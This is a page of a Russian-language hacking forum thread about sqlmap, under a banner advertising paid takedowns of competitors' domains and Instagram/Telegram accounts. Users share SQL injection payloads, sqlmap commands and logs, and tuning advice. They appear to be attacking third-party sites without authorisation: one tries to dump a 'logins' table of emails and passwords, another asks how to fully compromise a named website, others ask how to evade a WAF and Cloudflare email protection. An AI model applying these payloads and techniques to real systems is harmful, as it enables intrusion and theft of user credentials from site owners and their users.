УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 90 из 115

« Первая

100

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#891

28.04.2019, 06:44

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от ruvtshow

↑
Помогите разобраться, постоянно прости токен при запуске, конкретно по этой ссылке, при этом через Sqli Dumper. база сливается спокойно, но криво.
https://paste.pics/5EOE3
Как с этим бороться?
GET parameter 'carttoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests?
и чтобы не выбрал по итогу:
Spoiler: КОД
[13:42:18] [INFO] testing connection to the target URL
[13:42:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:42:25] [INFO] testing if the target URL content is stable
[13:42:32] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] с
[13:42:43] [INFO] ignoring GET parameter 'carttoken'
[13:42:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'[*] ending @ 13:42:43 /2019-04-27/
'action' is not recognized as an internal or external command,
operable program or batch file.
'ItemID' is not recognized as an internal or external command,
operable program or batch file.
'category' is not recognized as an internal or external command,
operable program or batch file.
'viewby' is not recognized as an internal or external command,
operable program or batch file.
'sortorder' is not recognized as an internal or external command,
operable program or batch file.
исход всегда один и тот же.
Просто я понять не могу, везде про csrf и anti-csrf пишут и показывают, речь идет о входа куда либо (username
assword)
А это обычная страница с описанием товара. токен она отсылает, а где взять anti-csrf - ума не приложу.

Что-то не понятное ты в водишь

#892

28.04.2019, 23:41

ruvtshow

Новичок

Регистрация: 27.04.2019

Сообщений: 6

Провел на форуме:
1589

Репутация: 0

Да, так и естьб поменял параметр на другой, и все стало впорядке, теперь возникла другая проблема.

При попытке дампа нужных мне строк, выдает вот такое:

.SpoilerTarget" type="button">Spoiler: code
[WARNING] unable to retrieve the entries of columns 'EmailAddress, Password, Permissions, Username' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied)

[22:36:01] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 1 times

[22:36:01] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Как это обойти?

#893

29.04.2019, 00:01

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Соединение рвётся, или ещё что-то waf как показывает лог

#894

29.04.2019, 01:11

ruvtshow

Новичок

Регистрация: 27.04.2019

Сообщений: 6

Провел на форуме:
1589

Репутация: 0

Вот все, что выдает

.SpoilerTarget" type="button">Spoiler

RAW_TRACE

at cfindex2ecfm1932376464.runPage(C:\home\БЛАБЛ� �БЛА\wwwroot\index.cfm:86)

TEMPLATE

C:\home\БЛАБЛАБЛА\wwwroot\index.cfm

TYPE

CFML

Token:

0

[00:07:59] [WARNING] unable to retrieve the entries of columns 'EmailAddress' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied)

[00:07:59] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 2 times

[00:07:59] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

#895

29.04.2019, 21:04

vladF

Новичок

Регистрация: 05.12.2018

Сообщений: 16

Провел на форуме:
6200

Репутация: 0

Доброго времени суток.

Имеется вот такой результат со сканера:

www.site /forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*//page/

Подскажите как правильно составить запрос для sqlmap

#896

29.04.2019, 21:15

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от vladF

↑
Доброго времени суток.
Имеется вот такой результат со сканера:
www.site
/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*//page/
Подскажите как правильно составить запрос для sqlmap

sqlmap -u "http://www.site /forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa*/page/ " --dbs

#897

28.05.2019, 08:20

kcash

Познающий

Регистрация: 06.04.2009

Сообщений: 30

Провел на форуме:
60216

Репутация: 0

Как уработать ресурс до конца?

[*] starting at 06:41:49

[06:41:49] [INFO] parsing HTTP request from 'r.txt'

custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y

[06:41:51] [INFO] resuming back-end DBMS 'microsoft access'

[06:41:51] [INFO] testing connection to the target URL

[06:41:53] [INFO] heuristics detected web page charset 'windows-1251'

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.bok-o-bok.ru:80/filmoteka.asp?film=412 AND 9579=9579&lan=2

---

[06:41:53] [INFO] the back-end DBMS is Microsoft Access

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, Microsoft IIS 7.5, ASP

back-end DBMS: Microsoft Access

[06:41:53] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'

[06:41:53] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'

[06:41:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[06:41:53] [INFO] retrieved:

you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to me

rge them in further requests? [Y/n] y

[06:41:56] [INFO] heuristics detected web page charset 'ascii'

[06:41:56] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases

[06:41:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'

[06:41:56] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'

[06:41:56] [ERROR] cannot retrieve table names, back-end DBMS is Access

do you want to use common table existence check? [Y/n/q] y

which common tables (wordlist) file do you want to use?

[1] default 'C:\Python27\sqlmap\txt\common-tables.txt' (press Enter)

[2] custom

> 1

[06:42:03] [INFO] checking table existence using items from 'C:\Python27\sqlmap\txt\common-tables.txt'

[06:42:03] [INFO] adding words used on web page to the check list

please enter number of threads? [Enter for 1 (current)] 4

[06:42:13] [INFO] starting 4 threads

[06:45:57] [WARNING] no table(s) found

No tables found

[06:45:57] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 3143 times

#898

31.05.2019, 13:56

aparsera

Новичок

Регистрация: 19.06.2018

Сообщений: 6

Провел на форуме:
1774

Репутация: 0

Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla

Но мап ее не видит, подозреваю из-за OR OR

Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило?

upd

изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить?

OR boolean-based blind - WHERE or HAVING clause

1

1

1

1,9

2

OR [INFERENCE]

%27OR 1=1 OR %273%27=%273

%27OR 1=2 OR %273%27=%273

[03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER

E or HAVING clause' injectable

[03:55:51] [INFO] automatically extending ranges for UNION query injection techn

ique tests as there is at least one other (potential) technique found

[03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage

of switch '--drop-set-cookie' if you experience any problems during data retriev

al

[03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals

e positive

[03:56:05] [WARNING] false positive or unexploitable injection point detected

[03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable

#899

31.05.2019, 15:42

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

чтоб sqlmap видел вектор через OR нужно указать --risk=3

#900

20.06.2019, 18:08

Timon B.

Новичок

Регистрация: 11.03.2014

Сообщений: 0

Провел на форуме:
0

Репутация: 0

Как можно обойти Cloudflare email protection, когда вместо емейлов в дампе : /cdn-cgi/l/email-protection" class="cf_email" data-

Нашел IP за Cloudflare, поставил его в hosts фаил в Windows. Но sqlmap/python это игнорит.

Спасибо

Страница 90 из 115

« Первая

100

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход